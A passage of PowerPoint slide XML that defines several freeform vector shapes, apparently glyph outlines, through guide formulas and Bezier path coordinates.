                <a:gd name="T31" fmla="*/ 31 h 217"/>
                <a:gd name="T32" fmla="*/ 99 w 245"/>
                <a:gd name="T33" fmla="*/ 16 h 217"/>
                <a:gd name="T34" fmla="*/ 78 w 245"/>
                <a:gd name="T35" fmla="*/ 0 h 217"/>
                <a:gd name="T36" fmla="*/ 21 w 245"/>
                <a:gd name="T37" fmla="*/ 0 h 217"/>
                <a:gd name="T38" fmla="*/ 0 w 245"/>
                <a:gd name="T39" fmla="*/ 15 h 217"/>
                <a:gd name="T40" fmla="*/ 25 w 245"/>
                <a:gd name="T41" fmla="*/ 31 h 217"/>
                <a:gd name="T42" fmla="*/ 55 w 245"/>
                <a:gd name="T43" fmla="*/ 198 h 217"/>
                <a:gd name="T44" fmla="*/ 79 w 245"/>
                <a:gd name="T45" fmla="*/ 217 h 217"/>
                <a:gd name="T46" fmla="*/ 109 w 245"/>
                <a:gd name="T47" fmla="*/ 182 h 217"/>
                <a:gd name="T48" fmla="*/ 123 w 245"/>
                <a:gd name="T49" fmla="*/ 120 h 217"/>
                <a:gd name="T50" fmla="*/ 124 w 245"/>
                <a:gd name="T51" fmla="*/ 120 h 217"/>
                <a:gd name="T52" fmla="*/ 147 w 245"/>
                <a:gd name="T53" fmla="*/ 209 h 217"/>
                <a:gd name="T54" fmla="*/ 168 w 245"/>
                <a:gd name="T55" fmla="*/ 217 h 217"/>
                <a:gd name="T56" fmla="*/ 190 w 245"/>
                <a:gd name="T57" fmla="*/ 198 h 217"/>
                <a:gd name="T58" fmla="*/ 220 w 245"/>
                <a:gd name="T59" fmla="*/ 3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5" h="217">
                  <a:moveTo>
                    <a:pt x="220" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="235" y="31"/>
                    <a:pt x="245" y="31"/>
                    <a:pt x="245" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245" y="0"/>
                    <a:pt x="233" y="0"/>
                    <a:pt x="224" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="167" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="0"/>
                    <a:pt x="146" y="0"/>
                    <a:pt x="146" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="31"/>
                    <a:pt x="157" y="31"/>
                    <a:pt x="167" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="191" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166" y="179"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="166"/>
                    <a:pt x="157" y="143"/>
                    <a:pt x="151" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="92"/>
                    <a:pt x="141" y="86"/>
                    <a:pt x="123" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="86"/>
                    <a:pt x="109" y="86"/>
                    <a:pt x="103" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="101"/>
                    <a:pt x="82" y="169"/>
                    <a:pt x="80" y="179"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="80" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="31"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="31"/>
                    <a:pt x="99" y="31"/>
                    <a:pt x="99" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="0"/>
                    <a:pt x="88" y="0"/>
                    <a:pt x="78" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="10" y="31"/>
                    <a:pt x="25" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="55" y="198"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="210"/>
                    <a:pt x="59" y="217"/>
                    <a:pt x="79" y="217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="217"/>
                    <a:pt x="100" y="213"/>
                    <a:pt x="109" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="138"/>
                    <a:pt x="122" y="131"/>
                    <a:pt x="123" y="120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="124" y="120"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="146"/>
                    <a:pt x="145" y="205"/>
                    <a:pt x="147" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="217"/>
                    <a:pt x="162" y="217"/>
                    <a:pt x="168" y="217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="217"/>
                    <a:pt x="188" y="209"/>
                    <a:pt x="190" y="198"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="220" y="3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80" name="Freeform 221">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0C926EF-A8C9-415E-8201-F7415A63B20F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId21"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2293939" y="3259138"/>
              <a:ext cx="95250" cy="95250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 95 w 227"/>
                <a:gd name="T1" fmla="*/ 125 h 218"/>
                <a:gd name="T2" fmla="*/ 185 w 227"/>
                <a:gd name="T3" fmla="*/ 31 h 218"/>
                <a:gd name="T4" fmla="*/ 206 w 227"/>
                <a:gd name="T5" fmla="*/ 53 h 218"/>
                <a:gd name="T6" fmla="*/ 227 w 227"/>
                <a:gd name="T7" fmla="*/ 31 h 218"/>
                <a:gd name="T8" fmla="*/ 180 w 227"/>
                <a:gd name="T9" fmla="*/ 0 h 218"/>
                <a:gd name="T10" fmla="*/ 95 w 227"/>
                <a:gd name="T11" fmla="*/ 41 h 218"/>
                <a:gd name="T12" fmla="*/ 95 w 227"/>
                <a:gd name="T13" fmla="*/ 24 h 218"/>
                <a:gd name="T14" fmla="*/ 75 w 227"/>
                <a:gd name="T15" fmla="*/ 3 h 218"/>
                <a:gd name="T16" fmla="*/ 20 w 227"/>
                <a:gd name="T17" fmla="*/ 3 h 218"/>
                <a:gd name="T18" fmla="*/ 0 w 227"/>
                <a:gd name="T19" fmla="*/ 18 h 218"/>
                <a:gd name="T20" fmla="*/ 20 w 227"/>
                <a:gd name="T21" fmla="*/ 34 h 218"/>
                <a:gd name="T22" fmla="*/ 61 w 227"/>
                <a:gd name="T23" fmla="*/ 34 h 218"/>
                <a:gd name="T24" fmla="*/ 61 w 227"/>
                <a:gd name="T25" fmla="*/ 188 h 218"/>
                <a:gd name="T26" fmla="*/ 20 w 227"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 0 w 227"/>
                <a:gd name="T29" fmla="*/ 203 h 218"/>
                <a:gd name="T30" fmla="*/ 20 w 227"/>
                <a:gd name="T31" fmla="*/ 218 h 218"/>
                <a:gd name="T32" fmla="*/ 150 w 227"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 171 w 227"/>
                <a:gd name="T35" fmla="*/ 203 h 218"/>
                <a:gd name="T36" fmla="*/ 150 w 227"/>
                <a:gd name="T37" fmla="*/ 188 h 218"/>
                <a:gd name="T38" fmla="*/ 95 w 227"/>
                <a:gd name="T39" fmla="*/ 188 h 218"/>
                <a:gd name="T40" fmla="*/ 95 w 227"/>
                <a:gd name="T41" fmla="*/ 12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7" h="218">
                  <a:moveTo>
                    <a:pt x="95" y="125"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="79"/>
                    <a:pt x="124" y="31"/>
                    <a:pt x="185" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="43"/>
                    <a:pt x="194" y="53"/>
                    <a:pt x="206" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="53"/>
                    <a:pt x="227" y="45"/>
                    <a:pt x="227" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="21"/>
                    <a:pt x="221" y="0"/>
                    <a:pt x="180" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="0"/>
                    <a:pt x="122" y="9"/>
                    <a:pt x="95" y="41"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="24"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="8"/>
                    <a:pt x="92" y="3"/>
                    <a:pt x="75" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="12" y="34"/>
                    <a:pt x="20" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="61" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="12" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="150" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="218"/>
                    <a:pt x="171" y="218"/>
                    <a:pt x="171" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="188"/>
                    <a:pt x="158" y="188"/>
                    <a:pt x="150" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="12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81" name="Freeform 222">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29E3944C-0FB7-4EB2-8717-A2A66299FCBB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId22"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2413001" y="3219451"/>
              <a:ext cx="79375" cy="134938"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 188"/>
                <a:gd name="T1" fmla="*/ 111 h 305"/>
                <a:gd name="T2" fmla="*/ 95 w 188"/>
                <a:gd name="T3" fmla="*/ 90 h 305"/>
                <a:gd name="T4" fmla="*/ 24 w 188"/>
                <a:gd name="T5" fmla="*/ 90 h 305"/>
                <a:gd name="T6" fmla="*/ 4 w 188"/>
                <a:gd name="T7" fmla="*/ 105 h 305"/>
                <a:gd name="T8" fmla="*/ 24 w 188"/>
                <a:gd name="T9" fmla="*/ 121 h 305"/>
                <a:gd name="T10" fmla="*/ 81 w 188"/>
                <a:gd name="T11" fmla="*/ 121 h 305"/>
                <a:gd name="T12" fmla="*/ 81 w 188"/>
                <a:gd name="T13" fmla="*/ 275 h 305"/>
                <a:gd name="T14" fmla="*/ 20 w 188"/>
                <a:gd name="T15" fmla="*/ 275 h 305"/>
                <a:gd name="T16" fmla="*/ 0 w 188"/>
                <a:gd name="T17" fmla="*/ 290 h 305"/>
                <a:gd name="T18" fmla="*/ 20 w 188"/>
                <a:gd name="T19" fmla="*/ 305 h 305"/>
                <a:gd name="T20" fmla="*/ 167 w 188"/>
                <a:gd name="T21" fmla="*/ 305 h 305"/>
                <a:gd name="T22" fmla="*/ 188 w 188"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 167 w 188"/>
                <a:gd name="T25" fmla="*/ 275 h 305"/>
                <a:gd name="T26" fmla="*/ 115 w 188"/>
                <a:gd name="T27" fmla="*/ 275 h 305"/>
                <a:gd name="T28" fmla="*/ 115 w 188"/>
                <a:gd name="T29" fmla="*/ 111 h 305"/>
                <a:gd name="T30" fmla="*/ 115 w 188"/>
                <a:gd name="T31" fmla="*/ 25 h 305"/>
                <a:gd name="T32" fmla="*/ 90 w 188"/>
                <a:gd name="T33" fmla="*/ 0 h 305"/>
                <a:gd name="T34" fmla="*/ 65 w 188"/>
                <a:gd name="T35" fmla="*/ 25 h 305"/>
                <a:gd name="T36" fmla="*/ 90 w 188"/>
                <a:gd name="T37" fmla="*/ 50 h 305"/>
                <a:gd name="T38" fmla="*/ 115 w 188"/>
                <a:gd name="T39" fmla="*/ 2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5" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="95"/>
                    <a:pt x="112" y="90"/>
                    <a:pt x="95" y="90"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="24" y="90"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="90"/>
                    <a:pt x="4" y="90"/>
                    <a:pt x="4" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="121"/>
                    <a:pt x="17" y="121"/>
                    <a:pt x="24" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="81" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="275"/>
                    <a:pt x="0" y="275"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="13" y="305"/>
                    <a:pt x="20" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="167" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="305"/>
                    <a:pt x="188" y="305"/>
                    <a:pt x="188" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="275"/>
                    <a:pt x="175" y="275"/>
                    <a:pt x="167" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115" y="111"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="115" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="11"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="90" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="0"/>
                    <a:pt x="65" y="11"/>
                    <a:pt x="65" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="39"/>
                    <a:pt x="76" y="50"/>
                    <a:pt x="90" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="50"/>
                    <a:pt x="115" y="39"/>
                    <a:pt x="115"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82" name="Freeform 223">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1816654B-110B-4313-960E-9BA06EE9EDF1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId23"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2513014" y="3232151"/>
              <a:ext cx="88900" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 98 w 211"/>
                <a:gd name="T1" fmla="*/ 92 h 279"/>
                <a:gd name="T2" fmla="*/ 180 w 211"/>
                <a:gd name="T3" fmla="*/ 92 h 279"/>
                <a:gd name="T4" fmla="*/ 200 w 211"/>
                <a:gd name="T5" fmla="*/ 77 h 279"/>
                <a:gd name="T6" fmla="*/ 180 w 211"/>
                <a:gd name="T7" fmla="*/ 61 h 279"/>
                <a:gd name="T8" fmla="*/ 98 w 211"/>
                <a:gd name="T9" fmla="*/ 61 h 279"/>
                <a:gd name="T10" fmla="*/ 98 w 211"/>
                <a:gd name="T11" fmla="*/ 20 h 279"/>
                <a:gd name="T12" fmla="*/ 81 w 211"/>
                <a:gd name="T13" fmla="*/ 0 h 279"/>
                <a:gd name="T14" fmla="*/ 64 w 211"/>
                <a:gd name="T15" fmla="*/ 20 h 279"/>
                <a:gd name="T16" fmla="*/ 64 w 211"/>
                <a:gd name="T17" fmla="*/ 61 h 279"/>
                <a:gd name="T18" fmla="*/ 20 w 211"/>
                <a:gd name="T19" fmla="*/ 61 h 279"/>
                <a:gd name="T20" fmla="*/ 0 w 211"/>
                <a:gd name="T21" fmla="*/ 77 h 279"/>
                <a:gd name="T22" fmla="*/ 20 w 211"/>
                <a:gd name="T23" fmla="*/ 92 h 279"/>
                <a:gd name="T24" fmla="*/ 64 w 211"/>
                <a:gd name="T25" fmla="*/ 92 h 279"/>
                <a:gd name="T26" fmla="*/ 64 w 211"/>
                <a:gd name="T27" fmla="*/ 213 h 279"/>
                <a:gd name="T28" fmla="*/ 134 w 211"/>
                <a:gd name="T29" fmla="*/ 279 h 279"/>
                <a:gd name="T30" fmla="*/ 211 w 211"/>
                <a:gd name="T31" fmla="*/ 213 h 279"/>
                <a:gd name="T32" fmla="*/ 194 w 211"/>
                <a:gd name="T33" fmla="*/ 194 h 279"/>
                <a:gd name="T34" fmla="*/ 177 w 211"/>
                <a:gd name="T35" fmla="*/ 213 h 279"/>
                <a:gd name="T36" fmla="*/ 136 w 211"/>
                <a:gd name="T37" fmla="*/ 249 h 279"/>
                <a:gd name="T38" fmla="*/ 98 w 211"/>
                <a:gd name="T39" fmla="*/ 210 h 279"/>
                <a:gd name="T40" fmla="*/ 98 w 211"/>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 h="279">
                  <a:moveTo>
                    <a:pt x="98" y="92"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="180" y="92"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="92"/>
                    <a:pt x="200" y="92"/>
                    <a:pt x="200" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="61"/>
                    <a:pt x="188" y="61"/>
                    <a:pt x="180" y="61"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="11"/>
                    <a:pt x="98" y="0"/>
                    <a:pt x="81" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="64" y="10"/>
                    <a:pt x="64" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="61"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="61"/>
                    <a:pt x="0" y="61"/>
                    <a:pt x="0" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="92"/>
                    <a:pt x="12" y="92"/>
                    <a:pt x="20" y="92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="213"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="261"/>
                    <a:pt x="98" y="279"/>
                    <a:pt x="134" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="279"/>
                    <a:pt x="211" y="258"/>
                    <a:pt x="211" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="204"/>
                    <a:pt x="211" y="194"/>
                    <a:pt x="194" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="194"/>
                    <a:pt x="177" y="204"/>
                    <a:pt x="177" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="244"/>
                    <a:pt x="148" y="249"/>
                    <a:pt x="136" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="249"/>
                    <a:pt x="98" y="223"/>
                    <a:pt x="98" y="210"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98"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83" name="Freeform 224">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDBDE09C-5D5E-47D4-A936-9ED3778CB6CC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId24"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2628901" y="3257551"/>
              <a:ext cx="87313" cy="98425"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 124 h 222"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 106 h 222"/>
                <a:gd name="T4" fmla="*/ 108 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 222"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 111 h 222"/>
                <a:gd name="T8" fmla="*/ 115 w 204"/>
                <a:gd name="T9" fmla="*/ 222 h 222"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 222"/>
                <a:gd name="T12" fmla="*/ 187 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 222"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 222"/>
                <a:gd name="T16" fmla="*/ 119 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 222"/>
                <a:gd name="T18" fmla="*/ 36 w 204"/>
                <a:gd name="T19" fmla="*/ 124 h 222"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 124 h 222"/>
                <a:gd name="T22" fmla="*/ 36 w 204"/>
                <a:gd name="T23" fmla="*/ 94 h 222"/>
                <a:gd name="T24" fmla="*/ 108 w 204"/>
                <a:gd name="T25" fmla="*/ 30 h 222"/>
                <a:gd name="T26" fmla="*/ 169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5" y="124"/>
                    <a:pt x="204" y="124"/>
                    <a:pt x="204" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="108" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="51" y="222"/>
                    <a:pt x="115" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="222"/>
                    <a:pt x="204" y="177"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="190" y="151"/>
                    <a:pt x="187" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="151"/>
                    <a:pt x="174" y="152"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="187"/>
                    <a:pt x="132" y="192"/>
                    <a:pt x="119" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="192"/>
                    <a:pt x="44" y="167"/>
                    <a:pt x="36" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="124"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="94"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="58"/>
                    <a:pt x="73" y="30"/>
                    <a:pt x="108" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="30"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="169"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84" name="Freeform 225">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27204853-5C1F-470B-B91A-C1103EE4D50E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId25"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2765426" y="3201988"/>
              <a:ext cx="53975" cy="169863"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 131 w 131"/>
                <a:gd name="T1" fmla="*/ 373 h 387"/>
                <a:gd name="T2" fmla="*/ 119 w 131"/>
                <a:gd name="T3" fmla="*/ 358 h 387"/>
                <a:gd name="T4" fmla="*/ 34 w 131"/>
                <a:gd name="T5" fmla="*/ 194 h 387"/>
                <a:gd name="T6" fmla="*/ 120 w 131"/>
                <a:gd name="T7" fmla="*/ 29 h 387"/>
                <a:gd name="T8" fmla="*/ 131 w 131"/>
                <a:gd name="T9" fmla="*/ 14 h 387"/>
                <a:gd name="T10" fmla="*/ 116 w 131"/>
                <a:gd name="T11" fmla="*/ 0 h 387"/>
                <a:gd name="T12" fmla="*/ 0 w 131"/>
                <a:gd name="T13" fmla="*/ 194 h 387"/>
                <a:gd name="T14" fmla="*/ 40 w 131"/>
                <a:gd name="T15" fmla="*/ 323 h 387"/>
                <a:gd name="T16" fmla="*/ 116 w 131"/>
                <a:gd name="T17" fmla="*/ 387 h 387"/>
                <a:gd name="T18" fmla="*/ 131 w 131"/>
                <a:gd name="T19" fmla="*/ 373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387">
                  <a:moveTo>
                    <a:pt x="131" y="373"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="366"/>
                    <a:pt x="128" y="364"/>
                    <a:pt x="119" y="358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="316"/>
                    <a:pt x="34" y="249"/>
                    <a:pt x="34" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="144"/>
                    <a:pt x="53" y="74"/>
                    <a:pt x="120" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="24"/>
                    <a:pt x="131" y="22"/>
                    <a:pt x="131" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="10"/>
                    <a:pt x="129" y="0"/>
                    <a:pt x="116" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="0"/>
                    <a:pt x="0" y="66"/>
                    <a:pt x="0" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="253"/>
                    <a:pt x="23" y="298"/>
                    <a:pt x="40" y="323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="359"/>
                    <a:pt x="104" y="387"/>
                    <a:pt x="116" y="387"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="387"/>
